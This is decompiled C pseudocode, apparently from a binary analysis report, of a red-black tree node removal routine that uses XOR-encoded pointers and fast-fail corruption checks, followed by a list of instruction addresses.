                                                                      				if((_t393 &  ~_t452) != 0) {
                                                                      					_t289 = _t393;
                                                                      					_t427 = _v5;
                                                                      					_t422 = _t393;
                                                                      					_v12 = _t393;
                                                                      					_v16 = 1;
                                                                      					if( *_t393 != 0) {
                                                                      						_v16 = _v16 & 0x00000000;
                                                                      						_t445 =  *_t393;
                                                                      						goto L115;
                                                                      						L116:
                                                                      						_t289 = _t445;
                                                                      						L117:
                                                                      						_t445 =  *_t289;
                                                                      						if(_t445 != 0) {
                                                                      							L115:
                                                                      							_t422 = _t289;
                                                                      							if(_t427 != 0) {
                                                                      								goto L183;
                                                                      							}
                                                                      							goto L116;
                                                                      						} else {
                                                                      							_t444 = _a8;
                                                                      							_v12 = _t289;
                                                                      							goto L27;
                                                                      						}
                                                                      						L183:
                                                                      						if(_t445 == 0) {
                                                                      							goto L116;
                                                                      						}
                                                                      						_t289 = _t289 ^ _t445;
                                                                      						goto L117;
                                                                      					}
                                                                      					L27:
                                                                      					if(_t427 != 0) {
                                                                      						if(_t452 == 0) {
                                                                      							goto L28;
                                                                      						}
                                                                      						_t428 = _t289 ^ _t452;
                                                                      						L29:
                                                                      						 *_t289 = _t428;
                                                                      						_t429 =  *(_t452 + 8);
                                                                      						_v20 = _t429;
                                                                      						_t426 = _t429 & 0xfffffffc;
                                                                      						_t292 =  *(_a4 + 4) & 0x00000001;
                                                                      						_v6 = _t292;
                                                                      						_t293 = _v12;
                                                                      						if(_t292 != 0) {
                                                                      							if(_t426 != 0) {
                                                                      								_t426 = _t426 ^ _t452;
                                                                      							}
                                                                      						}
                                                                      						if(_t426 != _t444) {
                                                                      							L174:
                                                                      							_t423 = 0x1d;
                                                                      							asm("int 0x29");
                                                                      							goto L175;
                                                                      						} else {
                                                                      							_t436 = _t293;
                                                                      							if(_v6 != 0) {
                                                                      								_t436 = _t436 ^ _t452;
                                                                      							}
                                                                      							_v20 = _v20 & 0x00000003;
                                                                      							_v20 = _v20 | _t436;
                                                                      							 *(_t452 + 8) = _v20;
                                                                      							_t426 =  *(_t393 + 8) & 0xfffffffc;
                                                                      							_t356 =  *(_a4 + 4) & 0x00000001;
                                                                      							_v6 = _t356;
                                                                      							_t357 = _v12;
                                                                      							if(_t356 != 0) {
                                                                      								if(_t426 != 0) {
                                                                      									_t426 = _t426 ^ _t393;
                                                                      								}
                                                                      							}
                                                                      							if(_t426 != _t444) {
                                                                      								goto L174;
                                                                      							} else {
                                                                      								_t483 = _t393 ^ _t357;
                                                                      								_v24 = _t483;
                                                                      								if(_v6 == 0) {
                                                                      									_v24 = _t357;
                                                                      								}
                                                                      								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
                                                                      								_t426 =  *(_t357 + 4);
                                                                      								_t444 = _a8;
                                                                      								_t359 =  *(_a4 + 4) & 0x00000001;
                                                                      								_v6 = _t359;
                                                                      								_t360 = _v12;
                                                                      								_v24 = _t483;
                                                                      								if(_t359 != 0) {
                                                                      									_v24 = _t483;
                                                                      									if(_t426 == 0) {
                                                                      										goto L37;
                                                                      									}
                                                                      									_t426 = _t426 ^ _t360;
                                                                      									L38:
                                                                      									if(_v6 == 0) {
                                                                      										_t483 = _t393;
                                                                      									}
                                                                      									_t413 =  *(_t360 + 8);
                                                                      									 *(_t360 + 4) = _t483;
                                                                      									_t452 = _t413 & 0xfffffffc;
                                                                      									_v5 = _t413;
                                                                      									_t363 =  *(_a4 + 4) & 0x00000001;
                                                                      									_v6 = _t363;
                                                                      									if(_t363 != 0) {
                                                                      										_t364 = _v12;
                                                                      										_v5 = _t413;
                                                                      										if(_t452 == 0) {
                                                                      											goto L41;
                                                                      										}
                                                                      										_v20 = _t452;
                                                                      										_v20 = _v20 ^ _t364;
                                                                      										L42:
                                                                      										if(_v20 != _t422) {
                                                                      											_v5 = _t413;
                                                                      											if(_v6 == 0) {
                                                                      												L199:
                                                                      												_t366 = _v12;
                                                                      												L200:
                                                                      												if(_t452 != 0 || _t366 != _t422) {
                                                                      													goto L174;
                                                                      												} else {
                                                                      													goto L43;
                                                                      												}
                                                                      											}
                                                                      											_t366 = _v12;
                                                                      											_v5 = _t413;
                                                                      											if(_t452 == 0) {
                                                                      												goto L199;
                                                                      											}
                                                                      											_t452 = _t452 ^ _t366;
                                                                      											goto L200;
                                                                      										}
                                                                      										L43:
                                                                      										_t486 =  *(_t444 + 8) & 0xfffffffc;
                                                                      										if(_v6 != 0) {
                                                                      											if(_t486 != 0) {
                                                                      												_t486 = _t486 ^ _t444;
                                                                      											}
                                                                      											if(_v6 != 0 && _t486 != 0) {
                                                                      												_t486 = _t486 ^ _t366;
                                                                      											}
                                                                      										}
                                                                      										_t415 = _t413 & 0x00000003 | _t486;
                                                                      										 *(_t366 + 8) = _t415;
                                                                      										_t416 = _v12;
                                                                      										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
                                                                      										_t452 =  *(_t444 + 8);
                                                                      										_t372 = _a4;
                                                                      										if((_t452 & 0xfffffffc) == 0) {
                                                                      											if( *_t372 != _t444) {
                                                                      												goto L174;
                                                                      											} else {
                                                                      												 *_t372 = _t416;
                                                                      												goto L52;
                                                                      											}
                                                                      										} else {
                                                                      											_t452 = _t452 & 0xfffffffc;
                                                                      											_t378 = _t372[1] & 0x00000001;
                                                                      											_v6 = _t378;
                                                                      											if(_t378 != 0) {
                                                                      												if(_t452 != 0) {
                                                                      													_t452 = _t452 ^ _t444;
                                                                      												}
                                                                      											}
                                                                      											_t379 =  *(_t452 + 4);
                                                                      											if(_v6 != 0) {
                                                                      												if(_t379 != 0) {
                                                                      													_t379 = _t379 ^ _t452;
                                                                      												}
                                                                      											}
                                                                      											_v24 = _t379;
                                                                      											_t382 = _t452 + (0 | _v24 == _t444) * 4;
                                                                      											_v28 = _t382;
                                                                      											_t383 =  *_t382;
                                                                      											if(_v6 != 0) {
                                                                      												if(_t383 != 0) {
                                                                      													_t383 = _t383 ^ _t452;
                                                                      												}
                                                                      											}
                                                                      											if(_t383 != _t444) {
                                                                      												goto L174;
                                                                      											} else {
                                                                      												if(_v6 != 0) {
                                                                      													_t487 = _t452 ^ _t416;
                                                                      												} else {
                                                                      													_t487 = _t416;
                                                                      												}
                                                                      												 *_v28 = _t487;
                                                                      												L52:
                                                                      												_t373 = _v5;
                                                                      												L12:
                                                                      												_t452 = _a4;
                                                                      												_v5 = _t373 & 0x00000001;
                                                                      												if(( *(_t452 + 4) & 0x00000001) != 0) {
                                                                      													if(_t426 == 0) {
                                                                      														goto L13;
                                                                      													}
                                                                      													_t306 = _t422 ^ _t426;
                                                                      													L14:
                                                                      													_t444 = _v16;
                                                                      													 *(_t422 + _t444 * 4) = _t306;
                                                                      													if(_t426 != 0) {
                                                                      														_t306 =  *(_t426 + 8) & 0xfffffffc;
                                                                      														_t418 =  *(_t452 + 4) & 0x00000001;
                                                                      														_v6 = _t418;
                                                                      														_t419 = _v12;
                                                                      														if(_t418 != 0) {
                                                                      															if(_t306 != 0) {
                                                                      																_t306 = _t306 ^ _t426;
                                                                      															}
                                                                      														}
                                                                      														if(_t306 != _t419) {
                                                                      															goto L174;
                                                                      														} else {
                                                                      															if(_v6 != 0) {
                                                                      																if(_t422 != 0) {
                                                                      																	_t422 = _t422 ^ _t426;
                                                                      																}
                                                                      															}
                                                                      															 *(_t426 + 8) = _t422;
                                                                      															L24:
                                                                      															return _t306;
                                                                      														}
                                                                      													}
                                                                      													if(_v5 != _t426) {
                                                                      														goto L24;
                                                                      													} else {
                                                                      														_t395 = _t452;
                                                                      														_t306 =  *(_t395 + 4);
                                                                      														L17:
                                                                      														_t446 = _t423;
                                                                      														_t434 = _v16 ^ 0x00000001;
                                                                      														_v24 = _t446;
                                                                      														_v12 = _t434;
                                                                      														_t452 =  *(_t423 + _t434 * 4);
                                                                      														if((_t306 & 0x00000001) != 0) {
                                                                      															if(_t452 == 0) {
                                                                      																goto L18;
                                                                      															}
                                                                      															_t426 = _t452 ^ _t446;
                                                                      															L19:
                                                                      															if(( *(_t426 + 8) & 0x00000001) != 0) {
                                                                      																_t310 =  *(_t426 + 8) & 0xfffffffc;
                                                                      																_t444 = _t306 & 1;
                                                                      																if(_t444 != 0) {
                                                                      																	if(_t310 != 0) {
                                                                      																		_t310 = _t310 ^ _t426;
                                                                      																	}
                                                                      																}
                                                                      																if(_t310 != _t423) {
                                                                      																	goto L174;
                                                                      																} else {
                                                                      																	if(_t444 != 0) {
                                                                      																		if(_t452 != 0) {
                                                                      																			_t452 = _t452 ^ _t423;
                                                                      																		}
                                                                      																	}
                                                                      																	if(_t452 != _t426) {
                                                                      																		goto L174;
                                                                      																	} else {
                                                                      																		_t452 =  *(_t423 + 8) & 0xfffffffc;
                                                                      																		if(_t444 != 0) {
                                                                      																			if(_t452 == 0) {
                                                                      																				L170:
                                                                      																				if( *_t395 != _t423) {
                                                                      																					goto L174;
                                                                      																				} else {
                                                                      																					 *_t395 = _t426;
                                                                      																					L140:
                                                                      																					if(_t444 != 0) {
                                                                      																						if(_t452 != 0) {
                                                                      																							_t452 = _t452 ^ _t426;
                                                                      																						}
                                                                      																					}
                                                                      																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                                                      																					_t300 =  *(_t426 + _v16 * 4);
                                                                      																					if(_t444 != 0) {
                                                                      																						if(_t300 == 0) {
                                                                      																							goto L143;
                                                                      																						}
                                                                      																						_t300 = _t300 ^ _t426;
                                                                      																						goto L142;
                                                                      																					} else {
                                                                      																						L142:
                                                                      																						if(_t300 != 0) {
                                                                      																							_t401 =  *(_t300 + 8);
                                                                      																							_t452 = _t401 & 0xfffffffc;
                                                                      																							if(_t444 != 0) {
                                                                      																								if(_t452 != 0) {
                                                                      																									_t452 = _t452 ^ _t300;
                                                                      																								}
                                                                      																							}
                                                                      																							if(_t452 != _t426) {
                                                                      																								goto L174;
                                                                      																							} else {
                                                                      																								if(_t444 != 0) {
                                                                      																									_t481 = _t300 ^ _t423;
                                                                      																								} else {
                                                                      																									_t481 = _t423;
                                                                      																								}
                                                                      																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
                                                                      																								goto L143;
                                                                      																							}
                                                                      																						}
                                                                      																						L143:
                                                                      																						if(_t444 != 0) {
                                                                      																							if(_t300 != 0) {
                                                                      																								_t300 = _t300 ^ _t423;
                                                                      																							}
                                                                      																						}
                                                                      																						 *(_t423 + _v12 * 4) = _t300;
                                                                      																						_t454 = _t426;
                                                                      																						if(_t444 != 0) {
                                                                      																							_t455 = _t454 ^ _t423;
                                                                      																							_t301 = _t455;
                                                                      																						} else {
                                                                      																							_t301 = _t423;
                                                                      																							_t455 = _t454 ^ _t301;
                                                                      																						}
                                                                      																						 *(_t426 + _v16 * 4) = _t301;
                                                                      																						_t395 = _a4;
                                                                      																						if(_t444 == 0) {
                                                                      																							_t455 = _t426;
                                                                      																						}
                                                                      																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
                                                                      																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
                                                                      																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
                                                                      																						_t426 =  *(_t423 + _v12 * 4);
                                                                      																						_t306 =  *(_t395 + 4);
                                                                      																						if((_t306 & 0x00000001) != 0) {
                                                                      																							if(_t426 != 0) {
                                                                      																								_t426 = _t426 ^ _t423;
                                                                      																							}
                                                                      																						}
                                                                      																						_t446 = _v24;
                                                                      																						goto L20;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																			_t452 = _t452 ^ _t423;
                                                                      																		}
                                                                      																		if(_t452 == 0) {
                                                                      																			goto L170;
                                                                      																		}
                                                                      																		_t311 =  *(_t452 + 4);
                                                                      																		if(_t444 != 0) {
                                                                      																			if(_t311 != 0) {
                                                                      																				_t311 = _t311 ^ _t452;
                                                                      																			}
                                                                      																		}
                                                                      																		if(_t311 == _t423) {
                                                                      																			if(_t444 != 0) {
                                                                      																				L175:
                                                                      																				_t295 = _t452 ^ _t426;
                                                                      																				goto L169;
                                                                      																			} else {
                                                                      																				_t295 = _t426;
                                                                      																				L169:
                                                                      																				 *(_t452 + 4) = _t295;
                                                                      																				goto L140;
                                                                      																			}
                                                                      																		} else {
                                                                      																			_t312 =  *_t452;
                                                                      																			if(_t444 != 0) {
                                                                      																				if(_t312 != 0) {
                                                                      																					_t312 = _t312 ^ _t452;
                                                                      																				}
                                                                      																			}
                                                                      																			if(_t312 != _t423) {
                                                                      																				goto L174;
                                                                      																			} else {
                                                                      																				if(_t444 != 0) {
                                                                      																					_t314 = _t452 ^ _t426;
                                                                      																				} else {
                                                                      																					_t314 = _t426;
                                                                      																				}
                                                                      																				 *_t452 = _t314;
                                                                      																				goto L140;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      															L20:
                                                                      															_t456 =  *_t426;
                                                                      															_t307 = _t306 & 0x00000001;
                                                                      															if(_t456 != 0) {
                                                                      																if(_t307 != 0) {
                                                                      																	_t456 = _t456 ^ _t426;
                                                                      																}
                                                                      																if(( *(_t456 + 8) & 0x00000001) == 0) {
                                                                      																	goto L21;
                                                                      																} else {
                                                                      																	L56:
                                                                      																	_t461 =  *(_t426 + _v12 * 4);
                                                                      																	if(_t307 != 0) {
                                                                      																		if(_t461 == 0) {
                                                                      																			L59:
                                                                      																			_t462 = _v16;
                                                                      																			_t444 =  *(_t426 + _t462 * 4);
                                                                      																			if(_t307 != 0) {
                                                                      																				if(_t444 != 0) {
                                                                      																					_t444 = _t444 ^ _t426;
                                                                      																				}
                                                                      																			}
                                                                      																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
                                                                      																			_t452 = _t462 ^ 0x00000001;
                                                                      																			_t405 =  *(_t395 + 4) & 1;
                                                                      																			_t316 =  *(_t444 + 8) & 0xfffffffc;
                                                                      																			_v28 = _t405;
                                                                      																			_v24 = _t452;
                                                                      																			if(_t405 != 0) {
                                                                      																				if(_t316 != 0) {
                                                                      																					_t316 = _t316 ^ _t444;
                                                                      																				}
                                                                      																			}
                                                                      																			if(_t316 != _t426) {
                                                                      																				goto L174;
                                                                      																			} else {
                                                                      																				_t318 = _t452 ^ 0x00000001;
                                                                      																				_v32 = _t318;
                                                                      																				_t319 =  *(_t426 + _t318 * 4);
                                                                      																				if(_t405 != 0) {
                                                                      																					if(_t319 != 0) {
                                                                      																						_t319 = _t319 ^ _t426;
                                                                      																					}
                                                                      																				}
                                                                      																				if(_t319 != _t444) {
                                                                      																					goto L174;
                                                                      																				} else {
                                                                      																					_t320 =  *(_t423 + _t452 * 4);
                                                                      																					if(_t405 != 0) {
                                                                      																						if(_t320 != 0) {
                                                                      																							_t320 = _t320 ^ _t423;
                                                                      																						}
                                                                      																					}
                                                                      																					if(_t320 != _t426) {
                                                                      																						goto L174;
                                                                      																					} else {
                                                                      																						_t322 =  *(_t426 + 8) & 0xfffffffc;
                                                                      																						if(_t405 != 0) {
                                                                      																							if(_t322 != 0) {
                                                                      																								_t322 = _t322 ^ _t426;
                                                                      																							}
                                                                      																						}
                                                                      																						if(_t322 != _t423) {
                                                                      																							goto L174;
                                                                      																						} else {
                                                                      																							_t464 = _t423 ^ _t444;
                                                                      																							_t323 = _t464;
                                                                      																							if(_t405 == 0) {
                                                                      																								_t323 = _t444;
                                                                      																							}
                                                                      																							 *(_t423 + _v24 * 4) = _t323;
                                                                      																							_t407 = _v28;
                                                                      																							if(_t407 != 0) {
                                                                      																								if(_t423 != 0) {
                                                                      																									L72:
                                                                      																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
                                                                      																									_t328 =  *(_t444 + _v24 * 4);
                                                                      																									if(_t407 != 0) {
                                                                      																										if(_t328 == 0) {
                                                                      																											L74:
                                                                      																											if(_t407 != 0) {
                                                                      																												if(_t328 != 0) {
                                                                      																													_t328 = _t328 ^ _t426;
                                                                      																												}
                                                                      																											}
                                                                      																											 *(_t426 + _v32 * 4) = _t328;
                                                                      																											_t467 = _t426 ^ _t444;
                                                                      																											_t329 = _t467;
                                                                      																											if(_t407 == 0) {
                                                                      																												_t329 = _t426;
                                                                      																											}
                                                                      																											 *(_t444 + _v24 * 4) = _t329;
                                                                      																											if(_v28 == 0) {
                                                                      																												_t467 = _t444;
                                                                      																											}
                                                                      																											_t395 = _a4;
                                                                      																											_t452 = _t426;
                                                                      																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
                                                                      																											_t426 = _t444;
                                                                      																											L80:
                                                                      																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
                                                                      																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
                                                                      																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
                                                                      																											_t337 =  *(_t426 + 8) & 0xfffffffc;
                                                                      																											_t444 =  *(_t395 + 4) & 1;
                                                                      																											if(_t444 != 0) {
                                                                      																												if(_t337 != 0) {
                                                                      																													_t337 = _t337 ^ _t426;
                                                                      																												}
                                                                      																											}
                                                                      																											if(_t337 != _t423) {
                                                                      																												goto L174;
                                                                      																											} else {
                                                                      																												_t339 =  *(_t423 + _v12 * 4);
                                                                      																												if(_t444 != 0) {
                                                                      																													if(_t339 != 0) {
                                                                      																														_t339 = _t339 ^ _t423;
                                                                      																													}
                                                                      																												}
                                                                      																												if(_t339 != _t426) {
                                                                      																													goto L174;
                                                                      																												} else {
                                                                      																													_t452 =  *(_t423 + 8) & 0xfffffffc;
                                                                      																													if(_t444 != 0) {
                                                                      																														if(_t452 == 0) {
                                                                      																															L160:
                                                                      																															if( *_t395 != _t423) {
                                                                      																																goto L174;
                                                                      																															} else {
                                                                      																																 *_t395 = _t426;
                                                                      																																L93:
                                                                      																																if(_t444 != 0) {
                                                                      																																	if(_t452 != 0) {
                                                                      																																		_t452 = _t452 ^ _t426;
                                                                      																																	}
                                                                      																																}
                                                                      																																_t409 = _v16;
                                                                      																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                                                      																																_t343 =  *(_t426 + _t409 * 4);
                                                                      																																if(_t444 != 0) {
                                                                      																																	if(_t343 == 0) {
                                                                      																																		goto L96;
                                                                      																																	}
                                                                      																																	_t343 = _t343 ^ _t426;
                                                                      																																	goto L95;
                                                                      																																} else {
                                                                      																																	L95:
                                                                      																																	if(_t343 != 0) {
                                                                      																																		_t410 =  *(_t343 + 8);
                                                                      																																		_t452 = _t410 & 0xfffffffc;
                                                                      																																		if(_t444 != 0) {
                                                                      																																			if(_t452 != 0) {
                                                                      																																				_t452 = _t452 ^ _t343;
                                                                      																																			}
                                                                      																																		}
                                                                      																																		if(_t452 != _t426) {
                                                                      																																			goto L174;
                                                                      																																		} else {
                                                                      																																			if(_t444 != 0) {
                                                                      																																				_t474 = _t343 ^ _t423;
                                                                      																																			} else {
                                                                      																																				_t474 = _t423;
                                                                      																																			}
                                                                      																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
                                                                      																																			_t409 = _v16;
                                                                      																																			goto L96;
                                                                      																																		}
                                                                      																																	}
                                                                      																																	L96:
                                                                      																																	if(_t444 != 0) {
                                                                      																																		if(_t343 != 0) {
                                                                      																																			_t343 = _t343 ^ _t423;
                                                                      																																		}
                                                                      																																	}
                                                                      																																	 *(_t423 + _v12 * 4) = _t343;
                                                                      																																	if(_t444 != 0) {
                                                                      																																		_t345 = _t426 ^ _t423;
                                                                      																																		_t470 = _t345;
                                                                      																																	} else {
                                                                      																																		_t345 = _t423;
                                                                      																																		_t470 = _t426 ^ _t345;
                                                                      																																	}
                                                                      																																	 *(_t426 + _t409 * 4) = _t345;
                                                                      																																	if(_t444 == 0) {
                                                                      																																		_t470 = _t426;
                                                                      																																	}
                                                                      																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
                                                                      																																	 *(_t423 + 8) = _t306;
                                                                      																																	goto L24;
                                                                      																																}
                                                                      																															}
                                                                      																														}
                                                                      																														_t452 = _t452 ^ _t423;
                                                                      																													}
                                                                      																													if(_t452 == 0) {
                                                                      																														goto L160;
                                                                      																													}
                                                                      																													_t348 =  *(_t452 + 4);
                                                                      																													if(_t444 != 0) {
                                                                      																														if(_t348 != 0) {
                                                                      																															_t348 = _t348 ^ _t452;
                                                                      																														}
                                                                      																													}
                                                                      																													if(_t348 == _t423) {
                                                                      																														if(_t444 != 0) {
                                                                      																															_t350 = _t452 ^ _t426;
                                                                      																														} else {
                                                                      																															_t350 = _t426;
                                                                      																														}
                                                                      																														 *(_t452 + 4) = _t350;
                                                                      																														goto L93;
                                                                      																													} else {
                                                                      																														_t351 =  *_t452;
                                                                      																														if(_t444 != 0) {
                                                                      																															if(_t351 != 0) {
                                                                      																																_t351 = _t351 ^ _t452;
                                                                      																															}
                                                                      																														}
                                                                      																														if(_t351 != _t423) {
                                                                      																															goto L174;
                                                                      																														} else {
                                                                      																															if(_t444 != 0) {
                                                                      																																_t353 = _t452 ^ _t426;
                                                                      																															} else {
                                                                      																																_t353 = _t426;
                                                                      																															}
                                                                      																															 *_t452 = _t353;
                                                                      																															goto L93;
                                                                      																														}
                                                                      																													}
                                                                      																												}
                                                                      																											}
                                                                      																										}
                                                                      																										_t328 = _t328 ^ _t444;
                                                                      																									}
                                                                      																									if(_t328 != 0) {
                                                                      																										_t475 =  *(_t328 + 8);
                                                                      																										_v20 = _t475;
                                                                      																										_t452 = _t475 & 0xfffffffc;
                                                                      																										if(_t407 != 0) {
                                                                      																											if(_t452 != 0) {
                                                                      																												_t452 = _t452 ^ _t328;
                                                                      																											}
                                                                      																										}
                                                                      																										if(_t452 != _t444) {
                                                                      																											goto L174;
                                                                      																										} else {
                                                                      																											if(_t407 != 0) {
                                                                      																												_t477 = _t328 ^ _t426;
                                                                      																											} else {
                                                                      																												_t477 = _t426;
                                                                      																											}
                                                                      																											_v20 = _v20 & 0x00000003;
                                                                      																											_v20 = _v20 | _t477;
                                                                      																											 *(_t328 + 8) = _v20;
                                                                      																											goto L74;
                                                                      																										}
                                                                      																									}
                                                                      																									goto L74;
                                                                      																								}
                                                                      																							}
                                                                      																							_t464 = _t423;
                                                                      																							goto L72;
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		_t452 = _t461 ^ _t426;
                                                                      																	}
                                                                      																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
                                                                      																		goto L59;
                                                                      																	} else {
                                                                      																		goto L80;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      															L21:
                                                                      															_t457 =  *(_t426 + 4);
                                                                      															if(_t457 != 0) {
                                                                      																if(_t307 != 0) {
                                                                      																	_t457 = _t457 ^ _t426;
                                                                      																}
                                                                      																if(( *(_t457 + 8) & 0x00000001) == 0) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L56;
                                                                      																}
                                                                      															}
                                                                      															L22:
                                                                      															_t308 =  *(_t423 + 8);
                                                                      															if((_t308 & 0x00000001) == 0) {
                                                                      																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                                                      																_t306 =  *(_t395 + 4);
                                                                      																_t431 =  *(_t423 + 8) & 0xfffffffc;
                                                                      																_t397 = _t306 & 0x00000001;
                                                                      																if(_t397 != 0) {
                                                                      																	if(_t431 == 0) {
                                                                      																		goto L110;
                                                                      																	}
                                                                      																	_t423 = _t423 ^ _t431;
                                                                      																	L111:
                                                                      																	if(_t423 == 0) {
                                                                      																		goto L24;
                                                                      																	}
                                                                      																	_t432 =  *(_t423 + 4);
                                                                      																	if(_t397 != 0) {
                                                                      																		if(_t432 != 0) {
                                                                      																			_t432 = _t432 ^ _t423;
                                                                      																		}
                                                                      																	}
                                                                      																	_v16 = 0 | _t432 == _t446;
                                                                      																	_t395 = _a4;
                                                                      																	goto L17;
                                                                      																}
                                                                      																L110:
                                                                      																_t423 = _t431;
                                                                      																goto L111;
                                                                      															} else {
                                                                      																_t306 = _t308 & 0x000000fe;
                                                                      																 *(_t423 + 8) = _t306;
                                                                      																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                                                      																goto L24;
                                                                      															}
                                                                      														}
                                                                      														L18:
                                                                      														_t426 = _t452;
                                                                      														goto L19;
                                                                      													}
                                                                      												}
                                                                      												L13:
                                                                      												_t306 = _t426;
                                                                      												goto L14;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									L41:
                                                                      									_t366 = _v12;
                                                                      									_v20 = _t452;
                                                                      									goto L42;
                                                                      								}
                                                                      								L37:
                                                                      								_t483 = _v24;
                                                                      								goto L38;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L28:
                                                                      					_t428 = _t452;
                                                                      					goto L29;
                                                                      				}
                                                                      				_t385 = _v5;
                                                                      				_t422 =  *(_t444 + 8) & 0xfffffffc;
                                                                      				if(_t385 != 0) {
                                                                      					if(_t422 != 0) {
                                                                      						_t422 = _t422 ^ _t444;
                                                                      					}
                                                                      				}
                                                                      				_v12 = _t444;
                                                                      				if(_t422 == 0) {
                                                                      					if(_t426 != 0) {
                                                                      						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
                                                                      					}
                                                                      					_t425 = _a4;
                                                                      					if( *_t425 != _t444) {
                                                                      						goto L174;
                                                                      					} else {
                                                                      						_t425[4] = _t426;
                                                                      						_t306 = _t425[4] & 0x00000001;
                                                                      						if(_t306 != 0) {
                                                                      							_t425[4] = _t425[4] | 0x00000001;
                                                                      						}
                                                                      						 *_t425 = _t426;
                                                                      						goto L24;
                                                                      					}
                                                                      				} else {
                                                                      					_t452 =  *(_t422 + 4);
                                                                      					if(_t385 != 0) {
                                                                      						if(_t452 != 0) {
                                                                      							_t452 = _t452 ^ _t422;
                                                                      						}
                                                                      					}
                                                                      					if(_t452 == _t444) {
                                                                      						_v16 = 1;
                                                                      						L11:
                                                                      						_t373 =  *(_t444 + 8);
                                                                      						goto L12;
                                                                      					} else {
                                                                      						_t387 =  *_t422;
                                                                      						if(_v5 != 0) {
                                                                      							if(_t387 != 0) {
                                                                      								_t387 = _t387 ^ _t422;
                                                                      							}
                                                                      						}
                                                                      						if(_t387 != _t444) {
                                                                      							goto L174;
                                                                      						} else {
                                                                      							_t488 = _a4;
                                                                      							_v16 = _v16 & 0x00000000;
                                                                      							_t388 =  *(_t488 + 4);
                                                                      							_v24 = _t388;
                                                                      							if((_t388 & 0xfffffffe) == _t444) {
                                                                      								if(_t426 != 0) {
                                                                      									 *(_t488 + 4) = _t426;
                                                                      									if((_v24 & 0x00000001) != 0) {
                                                                      										_t390 = _t426;
                                                                      										L228:
                                                                      										 *(_t488 + 4) = _t390 | 0x00000001;
                                                                      									}
                                                                      									goto L11;
                                                                      								}
                                                                      								 *(_t488 + 4) = _t422;
                                                                      								if((_v24 & 0x00000001) == 0) {
                                                                      									goto L11;
                                                                      								} else {
                                                                      									_t390 = _t422;
                                                                      									goto L228;
                                                                      								}
                                                                      							}
                                                                      							goto L11;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}








































































































                                                                      0x009ff90b
                                                                      0x009ff911
                                                                      0x009ff917
                                                                      0x009ff919
                                                                      0x009ff91c
                                                                      0x00a55d63
                                                                      0x00a55d69
                                                                      0x00a55d69
                                                                      0x00a55d63
                                                                      0x009ff922
                                                                      0x009ff927
                                                                      0x00a55d72
                                                                      0x00a55d78
                                                                      0x00a55d78
                                                                      0x00a55d72
                                                                      0x009ff92d
                                                                      0x009ff931
                                                                      0x009ffa2d
                                                                      0x009ffa2d
                                                                      0x009ff939
                                                                      0x009ff940
                                                                      0x009ff944
                                                                      0x009ffa37
                                                                      0x009ffa39
                                                                      0x009ffa3c
                                                                      0x009ffa3e
                                                                      0x009ffa41
                                                                      0x009ffa48
                                                                      0x009ffe68
                                                                      0x009ffe6c
                                                                      0x009ffe6c
                                                                      0x009ffe78
                                                                      0x009ffe78
                                                                      0x009ffe7a
                                                                      0x009ffe7a
                                                                      0x009ffe7e
                                                                      0x009ffe6e
                                                                      0x009ffe6e
                                                                      0x009ffe72
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009ffe80
                                                                      0x009ffe80
                                                                      0x009ffe83
                                                                      0x00000000
                                                                      0x009ffe83
                                                                      0x00a55d7f
                                                                      0x00a55d81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55d87
                                                                      0x00000000
                                                                      0x00a55d87
                                                                      0x009ffa4e
                                                                      0x009ffa50
                                                                      0x00a55d90
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55d98
                                                                      0x009ffa58
                                                                      0x009ffa58
                                                                      0x009ffa5d
                                                                      0x009ffa60
                                                                      0x009ffa63
                                                                      0x009ffa69
                                                                      0x009ffa6b
                                                                      0x009ffa6e
                                                                      0x009ffa71
                                                                      0x00a55da1
                                                                      0x00a55da7
                                                                      0x00a55da7
                                                                      0x00a55da1
                                                                      0x009ffa79
                                                                      0x00a00071
                                                                      0x00a00073
                                                                      0x00a00074
                                                                      0x00000000
                                                                      0x009ffa7f
                                                                      0x009ffa83
                                                                      0x009ffa85
                                                                      0x00a55dae
                                                                      0x00a55dae
                                                                      0x009ffa8b
                                                                      0x009ffa8f
                                                                      0x009ffa98
                                                                      0x009ffaa1
                                                                      0x009ffaa4
                                                                      0x009ffaa6
                                                                      0x009ffaa9
                                                                      0x009ffaac
                                                                      0x00a55db7
                                                                      0x00a55dbd
                                                                      0x00a55dbd
                                                                      0x00a55db7
                                                                      0x009ffab4
                                                                      0x00000000
                                                                      0x009ffaba
                                                                      0x009ffabc
                                                                      0x009ffac2
                                                                      0x009ffac5
                                                                      0x009ffac7
